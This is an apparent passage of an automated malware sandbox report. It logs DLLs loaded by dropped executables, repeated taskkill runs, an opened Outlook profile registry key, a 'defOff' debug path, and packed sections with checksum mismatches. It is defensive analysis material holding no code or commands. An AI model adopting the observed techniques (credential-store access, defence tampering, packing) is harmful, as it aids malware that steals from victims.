                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: windows.shell.servicehostbuilder.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: secur32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mlang.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: policymanager.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: msvcp110_win.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ieframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: netapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wkscli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                          Source: file.exeStatic file information: File size 1889792 > 1048576
                          Source: file.exeStatic PE information: Raw size of zbdrpywl is bigger than: 0x100000 < 0x19b800
                          Source: Binary string: The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 00000030.00000003.2990921853.000001E575D58000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000030.00000003.2990921853.000001E575D58000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 76dd304e1d.exe, 00000020.00000002.2999391422.00000000007C2000.00000040.00000001.01000000.00000013.sdmp, 76dd304e1d.exe, 00000020.00000003.2865776882.0000000004E30000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: The name of the alarm to get. Defaults to the empty string.Whether an alarm of the given name was found to clear.The name of the alarm to clear. Defaults to the empty string.Details of a content script registered programmaticallyReturns the value of the overridden new tab page. Read-only.Unregister a content script registered programmaticallyRepresents information about a contextual identity.The name of the library's debug file. For example, 'xul.pdbInformation to filter the contextual identities being retrieved.After which mouse event context menus should popup.Returns the value of the overridden home page. Read-only.Details about the contextual identity being created.Deletes a contetual identity by its cookie Store ID.Whether to focus the input field and select its contents.If true, the text in the urlbar will also be selected.Stops the profiler and discards any captured profile data.Details about the contextual identity being created.Gathers the profile data from the current profiling session.The name of the provider whose behavior the listener returns.The name of the provider that will listen for engagement events.The name of the provider whose results the listener returns. source: firefox.exe, 00000030.00000003.2990921853.000001E575D58000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeUnpacked PE file: 9.2.7b9f3f6834.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;waxfszwi:EW;civszaqm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;waxfszwi:EW;civszaqm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeUnpacked PE file: 10.2.a78a39a396.exe.cd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;swacraub:EW;agtryioj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;swacraub:EW;agtryioj:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeUnpacked PE file: 30.2.a78a39a396.exe.cd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;swacraub:EW;agtryioj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;swacraub:EW;agtryioj:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeUnpacked PE file: 32.2.76dd304e1d.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W;cpzpcpnh:EW;ghvclarm:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeUnpacked PE file: 50.2.76dd304e1d.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W;cpzpcpnh:EW;ghvclarm:EW;.taggant:EW; vs :ER;.rsrc:W;
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeUnpacked PE file: 54.2.DocumentsCFCGIIEHIE.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zbdrpywl:EW;dwhjapcc:EW;.taggant:EW;
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[1].exe.6.drStatic PE information: real checksum: 0x43dbdc should be: 0x439e32
                          Source: a78a39a396.exe.6.drStatic PE information: real checksum: 0x1c62eb should be: 0x1bbe82
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x1d9c12 should be: 0x1d5526
                          Source: random[1].exe0.6.drStatic PE information: real checksum: 0x1daa1d should be: 0x1e37ff
                          Source: 159c892ab5.exe.6.drStatic PE information: real checksum: 0x43dbdc should be: 0x439e32
                          Source: 76dd304e1d.exe.6.drStatic PE information: real checksum: 0x2af78a should be: 0x2bbe48
                          Source: random[1].exe1.6.drStatic PE information: real checksum: 0x1c62eb should be: 0x1bbe82
                          Source: random[2].exe.10.drStatic PE information: real checksum: 0x1d9c12 should be: 0x1d5526
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: real checksum: 0x1d9c12 should be: 0x1d5526
                          Source: file.exeStatic PE information: real checksum: 0x1d9c12 should be: 0x1d5526
                          Source: 7b9f3f6834.exe.6.drStatic PE information: real checksum: 0x1daa1d should be: 0x1e37ff
                          Source: random[2].exe.6.drStatic PE information: real checksum: 0x2af78a should be: 0x2bbe48
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: zbdrpywl
                          Source: file.exeStatic PE information: section name: dwhjapcc
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: zbdrpywl
                          Source: skotes.exe.0.drStatic PE information: section name: dwhjapcc
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .rsrc
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: odbfcxsw
